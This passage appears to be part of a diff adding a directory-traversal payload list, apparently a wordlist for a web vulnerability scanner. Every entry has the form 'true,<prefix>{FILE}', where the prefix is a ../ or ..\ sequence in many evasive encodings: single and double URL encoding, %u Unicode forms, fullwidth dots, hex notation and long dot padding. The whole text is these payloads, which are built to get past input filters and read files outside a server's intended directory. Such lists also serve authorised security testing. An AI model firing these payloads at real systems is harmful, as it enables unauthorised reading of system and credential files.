"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + 